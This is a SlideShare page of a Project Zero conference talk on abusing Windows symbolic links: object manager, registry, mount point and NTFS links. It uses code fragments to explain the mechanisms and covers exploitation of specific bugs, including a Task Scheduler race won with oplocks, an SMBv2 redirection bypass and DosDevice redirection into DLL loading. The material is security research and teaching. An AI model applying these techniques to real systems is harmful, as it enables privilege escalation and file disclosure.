SlideShare a Scribd company logo
1 of 99
Download to read offline
A Link to the Past
Abusing Symbolic Links on Windows
James Forshaw @tiraniddo
1
James Forshaw @tiraniddo
Obligatory Background Slide
● Researcher in Google’s
Project Zero team
● Specialize in Windows
○ Especially local privilege
escalation
● Never met a logical
vulnerability I didn’t like
https://www.flickr.com/photos/barretthall/2478623520/
2
James Forshaw @tiraniddo
What I’m Going to Talk About
● Implementation of Symbolic Links on Windows
● Exploitable Bug Classes
● Example vulnerabilities
● Offensive exploitation tricks
3
James Forshaw @tiraniddo
Symbolic Links
4
James Forshaw @tiraniddo
Dangers of Symbolic Links
5
James Forshaw @tiraniddo
Resource Creation or Overwrite
6
Privileged Application
pathtoresource
Write to
resource
sensitivepath
Symbolic Link
James Forshaw @tiraniddo
Information Disclosure
7
Privileged Application
pathtoresource
Read
Resource
sensitivepath
Symbolic Link
Disclosure
Unprivileged Application
James Forshaw @tiraniddo
Time of Check/Time of Use
8
Privileged Application
pathtoresource
Check and
use
Resource
validfile
Check
Symbolic Link
maliciousfile
Use Symbolic
Link
James Forshaw @tiraniddo
History of Windows Symbolic Links
Windows NT 3.1 - July 27 1993
Object Manager Symbolic Links
Registry Key Symbolic Links
9
James Forshaw @tiraniddo
History of Windows Symbolic Links
Windows NT 3.1 - July 27 1993
Object Manager Symbolic Links
Registry Key Symbolic Links
Windows 2000 - Feb 17 2000
NTFS Mount Points and
Directory Junctions
10
James Forshaw @tiraniddo
History of Windows Symbolic Links
Windows NT 3.1 - July 27 1993
Object Manager Symbolic Links
Registry Key Symbolic Links
Windows 2000 - Feb 17 2000
NTFS Mount Points and
Directory Junctions
Windows Vista - Nov 30 2006
NTFS Symbolic Links
11
James Forshaw @tiraniddo
Object Manager Symbolic Links
12
James Forshaw @tiraniddo
Named Objects
13
IO/File
??C:Windowsnotepad.exe
DeviceNamedPipemypipe
Registry
RegistryMachineSoftware
Semaphore
BaseNamedObjectsMySema
James Forshaw @tiraniddo
Creating Object Manager Symbolic Links
HANDLE CreateSymlink(LPCWSTR linkname, LPCWSTR targetname)
{
OBJECT_ATTRIBUTES obj_attr;
UNICODE_STRING name, target;
HANDLE hLink;
RtlInitUnicodeString(&name, linkname);
RtlInitUnicodeString(&target, targetname);
InitializeObjectAttributes(&objAttr, &name,
OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtCreateSymbolicLinkObject(&hLink, SYMBOLIC_LINK_ALL_ACCESS,
&obj_attr, &target);
return hLink;
}
14
James Forshaw @tiraniddo
Parsing Name
Object Manager Reparsing
NtOpenSemaphore
15
MyObjectsGlobalMySema
James Forshaw @tiraniddo
Object Manager Reparsing
NtOpenSemaphore ObOpenObjectByName
16
Parsing Name
MyObjectsGlobalMySema
James Forshaw @tiraniddo
Object Manager Reparsing
NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName
17
Parsing Name
MyObjectsGlobalMySema
Current Component
James Forshaw @tiraniddo
Object Manager Reparsing
NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName
18
Parsing Name
MyObjectsGlobalMySema
Current Component
James Forshaw @tiraniddo
Object Manager Reparsing
NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName
ObpParseSymbolicLink
19
Parsing Name
MyObjectsGlobalMySema
Current Component
Global → BaseNamedObjects
James Forshaw @tiraniddo
Object Manager Reparsing
NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName
ObpParseSymbolicLink
20
Parsing Name
MyObjectsGlobalMySema
BaseNamedObjectsMySema
Global → BaseNamedObjects
James Forshaw @tiraniddo
Object Manager Reparsing
NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName
ObpParseSymbolicLink
STATUS_REPARSE
21
Parsing Name
BaseNamedObjectsMySema
James Forshaw @tiraniddo
Abusing Object Manager Symbolic Links
● Most obvious attack is object squatting
○ Redirect privileged object creation to another name
○ Open named pipes for attacking impersonation
○ Shadowing ALPC ports
● File symlink attacks perhaps more interesting!
22
James Forshaw @tiraniddo
Example Vulnerability
IE EPM MOTWCreateFile Information
Disclosure
23
James Forshaw @tiraniddo
IE Shell Broker MOTWCreateFile
24
HANDLE MOTWCreateFile(PCWSTR FileName, ...) {
if (FileHasMOTW(FileName) || IsURLFile(FileName)) {
return CreateFile(FileName, GENERIC_READ, ...);
}
}
BOOL IsURLFile(PCWSTR FileName) {
PCWSTR extension = PathFindExtension(FileName);
return wcsicmp(extension, L".url") == 0;
}
James Forshaw @tiraniddo
Win32 Path Support
Path Description
somepath Relative path to current
directory
c:somepath Absolute directory
.c:somepath Device path, canonicalized
?c:somepath Device path, non-
canonicalized
Interesting!
James Forshaw @tiraniddo
Win32 to Native NT File Paths
26
.c:somepathWin32 Path
James Forshaw @tiraniddo
Win32 to Native NT File Paths
27
.c:somepath
??c:somepath
Win32 Path
Native Path
RtlDosPathNameToRelativeNtPathName
James Forshaw @tiraniddo
Win32 to Native NT File Paths
28
.c:somepath
??c:somepath
Win32 Path
Native Path
RtlDosPathNameToRelativeNtPathName
DeviceHarddiskVolume4somepath
ObpLookupObjectName
After Lookup
James Forshaw @tiraniddo
Global Root Symlink
29
.GLOBALROOTsomepathWin32 Path
Empty
Symlink
Path
James Forshaw @tiraniddo
Global Root Symlink
30
.GLOBALROOTsomepath
??GLOBALROOTsomepath
Win32 Path
Native Path
RtlDosPathNameToRelativeNtPathName
Empty
Symlink
Path
James Forshaw @tiraniddo
Global Root Symlink
31
.GLOBALROOTsomepath
??GLOBALROOTsomepath
Win32 Path
Native Path
RtlDosPathNameToRelativeNtPathName
somepath
ObpLookupObjectName
After Lookup
Empty
Symlink
Path
James Forshaw @tiraniddo
Writeable Object Directories from IE Sandbox
32
Path Sandbox
RPC Control PM
SessionsXBaseNamedObjects PM
SessionsXAppContainerNamedObjectsSID... EPM
James Forshaw @tiraniddo
Exploiting
IShDocVwBroker* broker;
CreateSymlink(L"RPC Controlfake.url",
L"??C:somefile");
broker->MOTWCreateFile(
L".GLOBALROOTRPC Controlfake.url",
...);
// Read File
33
James Forshaw @tiraniddo
Registry Key Symbolic Links
34
James Forshaw @tiraniddo
Under the hood
35
NtOpenKey ObOpenObjectByName ObpLookupObjectName
Parsing Name
RegistryMachineMylink
James Forshaw @tiraniddo
Under the hood
36
NtOpenKey ObOpenObjectByName ObpLookupObjectName
CmpParseKey
Parsing Name
RegistryMachineMylink CmpGetSymbolicLink
Current Component
James Forshaw @tiraniddo
Under the hood
37
NtOpenKey ObOpenObjectByName ObpLookupObjectName
CmpParseKeySTATUS_REPARSE
CmpGetSymbolicLink
Parsing Name
RegistryMachineMylink
RegistryMachineNewKey
James Forshaw @tiraniddo
Serious Limitations
● Windows 7 fixed numerous issues with registry symbolic links
○ Blocked symlinks between untrusted (user) and trusted (local
machine) hives
○ Symbolic link must be a valid registry path
● MS10-021 ensured it was also available downstream
● Still can exploit user to user vulnerabilities such as in IE EPM
○ CVE-2013-5054
○ CVE-2014-6322
● Mitigation (pass flag to RegCreateKeyEx) still undocumented
38
James Forshaw @tiraniddo
NTFS Mount Points / Directory Junctions
39
James Forshaw @tiraniddo
Under the hood
40
NtOpenFile ObOpenObjectByName ObpLookupObjectName
IopParseDevice
Parsing Name
??C:tempmylinkfile NTFS Driver
James Forshaw @tiraniddo
Under the hood
41
NtOpenFile ObOpenObjectByName ObpLookupObjectName
IopParseDevice
Parsing Name
??C:tempmylinkfile
??C:Windows
NTFS Driver
James Forshaw @tiraniddo
Under the hood
42
NtOpenFile ObOpenObjectByName ObpLookupObjectName
IopParseDevice
NTFS Driver
STATUS_REPARSE
Parsing Name
??C:Windowsfile
James Forshaw @tiraniddo
Structure of a Mount Point
typedef struct MOUNT_POINT_REPARSE_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
};
43
Set to 0xA0000003 for Mount Point
Substitute NT Name
Print Name?
String Data
Header
Reparse
Data
James Forshaw @tiraniddo
Create a Mount Point
PREPARSE_DATA_BUFFER reparse_buffer =
BuildMountPoint(target);
CreateDirectory(dir);
HANDLE handle = CreateFile(dir, ...,
FILE_FLAG_BACKUP_SEMANTICS |
FILE_FLAG_OPEN_REPARSE_POINT, ...);
DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT,
reparse_buffer, reparse_buffer.size(), ...);
44
James Forshaw @tiraniddo
Mount Point Limitations
● Directory must be empty to set the reparse data
● Target device must be an IO device (no opening registry keys for
example)
● Target device heavily restricted in IopParseDevice:
45
IO_PARSE_CONTEXT *ctx;
if (ctx->LastReparseTag == IO_REPARSE_TAG_MOUNT_POINT) {
switch(TargetDeviceType) {
case FILE_DEVICE_DISK:
case FILE_DEVICE_CD_ROM:
case FILE_DEVICE_VIRTUAL_DISK:
case FILE_DEVICE_TAPE:
break;
default:
return STATUS_IO_REPARSE_DATA_INVALID;
}
}
Limited
Device Subset
James Forshaw @tiraniddo
Example Vulnerability
Windows Task Scheduler TOCTOU Arbitrary
File Creation
46
James Forshaw @tiraniddo
Running a Scheduled Task
47
void Load_Task_File(string task_name,
string orig_hash) {
string task_path =
"c:windowssystem32tasks" +
task_name;
string file_hash = Hash_File(task_path);
if (file_hash != orig_hash) {
Rewrite_Task_File(task_path);
}
}
Hash task
file contents
Rewrite Task without
Impersonation
James Forshaw @tiraniddo
System Task Folder
Writable from normal user privilege, therefore can create a mount point
directory
48
James Forshaw @tiraniddo
Winning the Race Condition
49
Hash File
Rewrite Task
File
???? Profit?
James Forshaw @tiraniddo
Is that an OPLOCK in your Pocket?
void SetOplock(HANDLE hFile) {
REQUEST_OPLOCK_INPUT_BUFFER inputBuffer;
REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer;
OVERLAPPED overlapped;
overlapped.hEvent = CreateEvent(...);
DeviceIoControl(hFile, FSCTL_REQUEST_OPLOCK,
&inputBuffer, sizeof(inputBuffer),
&outputBuffer, sizeof(outputBuffer),
nullptr, &overlapped);
WaitForSingleObject(overlapped.hEvent, ...);
}
50
James Forshaw @tiraniddo
User Application
Exploitation
Task Scheduler Service
51
IRegisteredTask::Run
Current Mount Point:
MyTaskFolder → C:dummy
Open File for Reading
C:DummyMyTask
James Forshaw @tiraniddo
User Application
Exploitation
Task Scheduler Service
52
IRegisteredTask::Run
Current Mount Point:
MyTaskFolder → C:windows
Open File for Reading
C:DummyMyTask
Change Mount Point
Location
Event Set
James Forshaw @tiraniddo
User Application
Exploitation
Task Scheduler Service
53
IRegisteredTask::Run
Current Mount Point:
MyTaskFolder → C:windows
Open File for Reading
C:DummyMyTask
Release Oplock
Change Mount Point
Location
Event Set
James Forshaw @tiraniddo
User Application
Exploitation
Task Scheduler Service
54
IRegisteredTask::Run
Current Mount Point:
MyTaskFolder → C:windows
Open File for Reading
C:DummyMyTask
Generate and Verify
Hash of File
C:DummyMyTask
Release Oplock
Change Mount Point
Location
Event Set
James Forshaw @tiraniddo
User Application
Exploitation
Task Scheduler Service
55
IRegisteredTask::Run
Current Mount Point:
MyTaskFolder → C:windows
Open File for Reading
C:DummyMyTask
Rewrite Task File
C:WindowsMyTask
Generate and Verify
Hash of File
C:DummyMyTask
Release Oplock
Change Mount Point
Location
Event Set
James Forshaw @tiraniddo
OPLOCK Limitations
● Can’t block on access to standard attributes or
FILE_READ_ATTRIBUTES
● One-shot, need to be quick to reestablish if opened multiple times
● Can get around attribute reading in certain circumstances by
oplocking a directory.
● For example these scenarios opens directories for read access
○ Shell SHParseDisplayName accesses each directory in path
○ GetLongPathName or GetShortPathName
○ FindFirstFile/FindNextFile
56
James Forshaw @tiraniddo
DEMO
OPLOCKs in Action
57
James Forshaw @tiraniddo
NTFS Symbolic Links
58
James Forshaw @tiraniddo
Structure of a Symbolic Link
typedef struct SYMLINK_REPARSE_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
USHORT Flags;
WCHAR PathBuffer[1];
};
59
Set to 0xA000000C for SymlinkHeader
Reparse
Data
Flags:
0 - Absolute path
1 - Relative path
James Forshaw @tiraniddo
Create Symlink Privilege
Admin user - Yay!
Normal user - Boo :-(
60
James Forshaw @tiraniddo
Create Symbolic Link Privilege
NTSTATUS NtfsSetReparsePoint(NTFS_CREATE_CONTEXT* ctx) {
// Validation ...
PREPARSE_DATA_BUFFER* reparse_buf;
if ((reparse_buf->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) &&
(ctx->Type != FILE_DIRECTORY)) {
return STATUS_NOT_A_DIRECTORY;
}
if ((reparse_buf->ReparseTag == IO_REPARSE_SYMLINK) &&
((ctx->Flags & 0x400) == 0)) {
return STATUS_ACCESS_DENIED
}
// ...
}
61
James Forshaw @tiraniddo
Create Symbolic Link Privilege
NTSTATUS NtfsSetReparsePoint(NTFS_CREATE_CONTEXT* ctx) {
// Validation ...
PREPARSE_DATA_BUFFER* reparse_buf;
if ((reparse_buf->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) &&
(ctx->Type != FILE_DIRECTORY)) {
return STATUS_NOT_A_DIRECTORY;
}
if ((reparse_buf->ReparseTag == IO_REPARSE_SYMLINK) &&
((ctx->Flags & 0x400) == 0)) {
return STATUS_ACCESS_DENIED
}
// ...
}
Context must contain
0x400 flag
62
James Forshaw @tiraniddo
Flags Setting
NTSTATUS NtfsSetCcbAccessFlags(NTFS_FILE_CONTEXT* ctx) {
ACCESS_MODE AccessMode = NtfsEffectiveMode();
if (ctx->HasRestorePrivilege) {
ctx->Flags |= 0x400;
}
if (AccessMode == KernelMode ||
SeSinglePrivilegeCheck(&SeCreateSymbolicLinkPrivilege,
&security_ctx,
UserMode)) {
ctx->Flags |= 0x400;
}
// ...
}
63
James Forshaw @tiraniddo
Hypothetical Scenario
NTSTATUS Handle_OpenLog(PIRP Irp) {
OBJECT_ATTRIBUTES objattr;
UNICODE_STRING name;
RtlInitUnicodeString(&name,
L"SystemRootLogFilesuser.log");
InitObjectAttributes(&objattr, &name, 0, 0, 0, 0);
PHANDLE Handle = Irp->AssociatedIrp->SystemBuffer;
return ZwCreateFile(Handle, &objattr, ...);
}
64
Returns handle to user
mode process
James Forshaw @tiraniddo 65
SMBv2 Symbolic Links
https://msdn.microsoft.com/en-us/library/cc246542.aspx
James Forshaw @tiraniddo
SMBv2 Symbolic Link Restrictions
66
● Remote to Local
would be useful
● Disabled by default
in local security
policy
James Forshaw @tiraniddo
Back to IopParseDevice
enum SymlinkDeviceType { Local, Network };
if (ctx->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { // ... }
else {
SymlinkDeviceType target_type =
GetSymlinkDeviceType(TargetDeviceType);
if (target_type == Local || target_type == Network)
{
if (!NT_SUCCESS(IopSymlinkEnforceEnabledTypes(
target_type, ctx->last_target_type))) {
return STATUS_IO_REPARSE_DATA_INVALID;
}
}
}
67
Enforces Symlink
Traversal based on
device types
James Forshaw @tiraniddo
MRXSMB20
NTSTATUS Smb2Create_Finalize(SMB_CONTEXT* ctx) {
// Make request and get response
if (RequestResult == STATUS_STOPPED_ON_SYMLINK) {
result = FsRtlValidateReparsePointBuffer(
ctx->ErrorData, ctx->ErrorDataLength);
if (!NT_SUCCESS(result)) {
return result;
}
}
// ...
}
68
No check on
ReparseTag
James Forshaw @tiraniddo
SMBv2 Device Type Bypass
69
NtOpenFile ObpLookupObjectName
IopParseDevice
SMB2 Driver
Parsing Name
serversharefile
Current Component
Server
Create sharefile
James Forshaw @tiraniddo
SMBv2 Device Type Bypass
70
NtOpenFile ObpLookupObjectName
IopParseDevice
SMB2 Driver
STATUS_REPARSE
Parsing Name
serversharefile
Current Component
Server
STATUS_STOPPED_ON_SYMLINK
with
IO_REPARSE_TAG_MOUNT_POINT
James Forshaw @tiraniddo
SMBv2 Device Type Bypass
71
NtOpenFile ObpLookupObjectName
IopParseDevice
SMB2 Driver
Parsing Name
serversharefile
??C:hello.txt
Server
NTFS Driver
James Forshaw @tiraniddo
DEMO
72
SMBv2 Local File Disclosure in IE
James Forshaw @tiraniddo
File Symbolic Links - Without Permissions
73
James Forshaw @tiraniddo
First Try
Default CreateFile call won’t open
the file.
Returns Access Denied
74
James Forshaw @tiraniddo
Success
FILE_FLAG_BACKUP_SEMANTICS
allows us to open the file
75
James Forshaw @tiraniddo
The NtCreateFile Paradox
FILE_DIRECTORY_FILE Flag
FILE_NON_DIRECTORY_FILE Flag
76
Neither FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE
James Forshaw @tiraniddo
The Old ADS Directory Trick
Using $INDEX_ALLOCATION stream
will bypass initial directory failure
77
James Forshaw @tiraniddo
Let Our Powers Combine
78
James Forshaw @tiraniddo
Let Our Powers Combine
79
NtOpenFile ObpLookupObjectName
IopParseDevice
Parsing Name
??C:tempmylink
RPC Controlmylink
NTFS Driver
STATUS_REPARSE
James Forshaw @tiraniddo 80
NtOpenFile ObpLookupObjectName
IopParseDevice
NTFS Driver
ObpParseSymbolicLink
STATUS_REPARSE
Parsing Name
RPC Controlmylink
??C:hello.txt
Let Our Powers Combine
James Forshaw @tiraniddo
Persisting the Symlink
● Might be useful to persist the symlink between login sessions
● Can’t pass OBJ_PERMANENT directly
○ Needs SeCreatePermanentPrivilege
● Get CSRSS to do it for us :-)
81
DefineDosDeviceW(
DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH,
L"GLOBALROOTRPC Controlmylink",
L"TargetPath"
);
James Forshaw @tiraniddo
Combined Symbolic Link Limitations
● All existing limitations of Mount Points apply
● Vulnerable application can’t try to list or inspect the mount point
itself
○ Listing the directory
○ Open for GetFileAttributes or similar
● Can mitigate somewhat by clever tricks with oplocks on directory
hierarchy
82
James Forshaw @tiraniddo
DEMO
One More Thing!
83
James Forshaw @tiraniddo
DEMO
One More Thing!
84
James Forshaw @tiraniddo
CVE-2015-1644
85
James Forshaw @tiraniddo
DosDevice Prefix
86
??c:somepath
THE
PREFIX
IS A LIE
James Forshaw @tiraniddo
DosDevice Prefix
87
Sessions0DosDevicesX-Yc:somepath
??c:somepath
James Forshaw @tiraniddo
DosDevice Prefix
88
Sessions0DosDevicesX-Yc:somepath
??c:somepath
GLOBAL??c:somepath
James Forshaw @tiraniddo
New C: Drive
89
James Forshaw @tiraniddo
Windows User Impersonation
90
James Forshaw @tiraniddo
Very Exploitable Behaviour
91
void ExploitableFunction() {
ImpersonateLoggedOnUser(hToken);
LoadLibrary("c:secure.dll");
RevertToSelf();
}
c:secure.dll
James Forshaw @tiraniddo
Very Exploitable Behaviour
92
void ExploitableFunction() {
ImpersonateLoggedOnUser(hToken);
LoadLibrary("c:secure.dll");
RevertToSelf();
}
c:secure.dll ??c:secure.dll
James Forshaw @tiraniddo
Very Exploitable Behaviour
93
void ExploitableFunction() {
ImpersonateLoggedOnUser(hToken);
LoadLibrary("c:secure.dll");
RevertToSelf();
}
c:secure.dll ??c:secure.dll Sessions0DosDevicesX-Yc:secure.dll
James Forshaw @tiraniddo
Very Exploitable Behaviour
94
void ExploitableFunction() {
ImpersonateLoggedOnUser(hToken);
LoadLibrary("c:secure.dll");
RevertToSelf();
}
c:secure.dll ??c:secure.dll Sessions0DosDevicesX-Yc:secure.dll
c:somearbitrary.dll
James Forshaw @tiraniddo
Very Exploitable Behaviour
95
void ExploitableFunction() {
ImpersonateLoggedOnUser(hToken);
LoadLibrary("secure.dll");
RevertToSelf();
}
void COMExploitableFunction() {
ImpersonateLoggedOnUser(hToken);
CoCreateInstance(CLSID_SecureObject, ...);
RevertToSelf();
}
James Forshaw @tiraniddo
Finding an Ideal Service
96
Requirement Spooler Service
Runs as NT AUTHORITYSYSTEM Yup
Uses impersonation Definitely
Accessible by normal user Kind of the point
Has a habit of loading DLLs Think of all the printer drivers
James Forshaw @tiraniddo
DEMO
REALLY One More Thing!
97
James Forshaw @tiraniddo
Links and References
● Symlink Testing Tools
https://github.com/google/symboliclink-testing-tools
● File Test Application
https://github.com/ladislav-zezula/FileTest
98
James Forshaw @tiraniddo
Questions?
99

More Related Content

What's hot

Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back44CON
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-AreaOrange Tsai
 
CNIT 126: 10: Kernel Debugging with WinDbg
CNIT 126: 10: Kernel Debugging with WinDbgCNIT 126: 10: Kernel Debugging with WinDbg
CNIT 126: 10: Kernel Debugging with WinDbgSam Bowne
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahOWASP Delhi
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory ForensicsIIJ
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...ufpb
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis   ...Or am I "Cuckoo for Malware?"Introduction to Dynamic Malware Analysis   ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"Lane Huff
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 

What's hot (20)

I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area
 
CNIT 126: 10: Kernel Debugging with WinDbg
CNIT 126: 10: Kernel Debugging with WinDbgCNIT 126: 10: Kernel Debugging with WinDbg
CNIT 126: 10: Kernel Debugging with WinDbg
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory Forensics
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis   ...Or am I "Cuckoo for Malware?"Introduction to Dynamic Malware Analysis   ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 

Viewers also liked

The Joy of Sandbox Mitigations
The Joy of Sandbox MitigationsThe Joy of Sandbox Mitigations
The Joy of Sandbox MitigationsJames Forshaw
 
Change Management 13 things to consider
Change Management 13 things to considerChange Management 13 things to consider
Change Management 13 things to considerpck100
 
Italian shopping
Italian shoppingItalian shopping
Italian shoppingJack740
 
νεο λυκειο
νεο λυκειονεο λυκειο
νεο λυκειοelpitheo
 
Speak! How to talk in public and not wreck your voice (Ignite OSCON 2014)
Speak! How to talk in public and not wreck your voice (Ignite OSCON 2014)Speak! How to talk in public and not wreck your voice (Ignite OSCON 2014)
Speak! How to talk in public and not wreck your voice (Ignite OSCON 2014)Florian Haas
 
United small business
United small businessUnited small business
United small businessJack740
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonOWASP Delhi
 
νεο λυκειο
νεο λυκειονεο λυκειο
νεο λυκειοelpitheo
 
More about health
More about healthMore about health
More about healthJack740
 
One Thor - Presentazione Giugno-Luglio 2014
One Thor  -  Presentazione Giugno-Luglio 2014 One Thor  -  Presentazione Giugno-Luglio 2014
One Thor - Presentazione Giugno-Luglio 2014 OnethorSlide
 
Meet the DIVA - by: Sandeep & Ankit
Meet the DIVA - by: Sandeep & Ankit Meet the DIVA - by: Sandeep & Ankit
Meet the DIVA - by: Sandeep & Ankit OWASP Delhi
 

Viewers also liked (14)

The Joy of Sandbox Mitigations
The Joy of Sandbox MitigationsThe Joy of Sandbox Mitigations
The Joy of Sandbox Mitigations
 
Change Management 13 things to consider
Change Management 13 things to considerChange Management 13 things to consider
Change Management 13 things to consider
 
How To Stop Smoking
How To Stop SmokingHow To Stop Smoking
How To Stop Smoking
 
Italian shopping
Italian shoppingItalian shopping
Italian shopping
 
νεο λυκειο
